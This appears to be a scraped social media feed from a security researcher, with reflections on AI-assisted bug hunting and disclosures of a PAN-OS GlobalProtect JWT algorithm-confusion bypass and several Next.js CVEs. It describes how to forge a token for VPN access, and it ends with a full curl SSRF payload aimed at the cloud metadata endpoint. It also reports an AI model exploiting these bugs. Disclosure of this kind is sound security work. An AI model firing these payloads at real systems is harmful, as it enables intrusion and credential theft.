Harsh Jaiswal

@pyn3rd Think so too!

I don’t think so. In my experience, AI is good at finding vulnerabilities when the source and sink are obvious. But beyond that, it tends to rely heavily on assumptions, which can be misleading if you don’t have a solid background in code analysis. React2Shell is a great example - it’s a highly complex, multi-stage vulnerability chain that’s extremely difficult for AI to identify for sure.

Can Mythos find React2Shell and exploit it?

Last year, on a vacation, @S1r1u5_ and I were discussing about the human need for validation and how most things we do can be tied to it, consciously or subconsciously. Mohan asked, Would you still be doing what you do (hacking, publishing blogs, competing, etc.) if no one was there to see it? At that time, my answer was "yeah, probably?" Today, the world has somewhat come to that. All the things you thought gave you validation are now norms. Things you once took pride in can be replicated in a few prompts. I mean, people are dropping 0days everyday now, and there's an unlikely chance of your blog getting reads so there goes that validation. So would you still do it on your own? For your own sake and sanity? My answer is a confident yes now. In the last couple of months, I've seen models find bugs autonomously or sometimes with just a bit of a hunch from me, but sharing these bugs publicly hasn't been rewarding. And not in the sense of likes or reach alone, I've just been less motivated overall. I have a few blogs sitting in my queue, and what I'm noticing is I keep procrastinating, because there's not much authenticity to my own work in them, and I don't have the enthusiasm to share the same story again, how the model found this and that. I think if you really love the game, sooner or later, you have to come to terms with the fact that to stay sane, you need to go back to that problem-solving phase, otherwise it gets pretty depressing. As much as I love watching LLMs find bugs, it feels soulless at times.. all this is a signal to me that I can't function like this in the long run. It makes me feel dopamine-deprived, and I need to be hacking shit on my own.. Now, when I say "on my own", I don't mean no AI, AI bad. No, not at all.. There's a big difference between using an LLM as an accelerator in your work vs delegating your understanding to it. From a long-term pov, the former is the only path imo, and even then, the mind map you build on your own is very different from the one you'd end up with leaning on LLMs. The dopamine hit isn't even close to figuring shit out on your own. Seeing how AI is making 0days the norm and CTFs no longer the same.. The question is more real now than ever. Would you still sit down and hack stuff even when no one's watching, knowing people might be on top of the leaderboard via AI, just for the love for the game?

StubZero: $148,337 RCE in Google Cloud Production brutecat.com/articles/googl…

@HacktronAI hacktron.ai/blog/cve-2026-…

This is a critical auth bypass (affecting GlobalProtect VPN), not sure why this was marked as high. I have already managed to get VPN access to major corps! Unlike the buffer overflow this isn't limited to PAN OS. Will be disclosing full details later next week on @HacktronAI blog. security.paloaltonetworks.com/CVE-2026-0265

After configuring CAS on my instance, and trust me, this was the toughest part of the journey. Once done, Claude forged a JWT, POSTs it to /SAML20/SP/ACS, and gets a session cookie/tokens which can be used to connect to the VPN. It was game over. Your private network was public. If you're running CAS-enabled PAN-OS, update the appliance immediately.

I pointed Claude to start diving into the CAS implementation in the shared libraries, and in just a few minutes, it had found a textbook JWT algorithm confusion. The verification function trusts the alg header from the JWT itself. Switch RS256 to HS256, and the public signing certificate becomes the HMAC secret key. I couldn't believe it at first, this in 2026??

When Your VPN Opens Your Private Network to the Public! An auth bypass in Palo Alto PAN-OS CAS Auth (CVE-2026-0265) that lets an attacker connect to the company's GlobalProtect VPN. Blog - hacktron.ai/blog/cve-2026-…

im tired boss..

We are investigating unauthorized access to GitHub’s internal repositories. While we currently have no evidence of impact to customer information stored outside of GitHub’s internal repositories (such as our customers’ enterprises, organizations, and repositories), we are closely monitoring our infrastructure for follow-on activity.

@LiveOverflow infosec community pandemic

my brain after one year of vibe coding

There are a few more interesting bugs, check those out here: app.hacktron.ai/disclosed/scan…

CVE-2026-44574: Middleware auth bypass via internal query params. Next.js uses internal query params nxtP and nxtI to pass resolved dynamic route params from routing to route modules. they're never stripped from external requests, leading to middleware bypass in dynamic routes.

Last week's Next.js stable release patches multiple vulnerabilities found by @HacktronAI CVE-2026-44578: SSRF via WebSocket upgrade. It is the most impactful of all, it lets an attacker read internal hosts such as cloud metadata endpoints on self-hosted next.js applications. curl -H "Connection: Upgrade" -H "Upgrade: websocket" \ -H "Sec-WebSocket-Version: 13" \ -H "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==" \ "http://target:3000" \ --request-target "http://169.254.169.254/latest/meta-data/"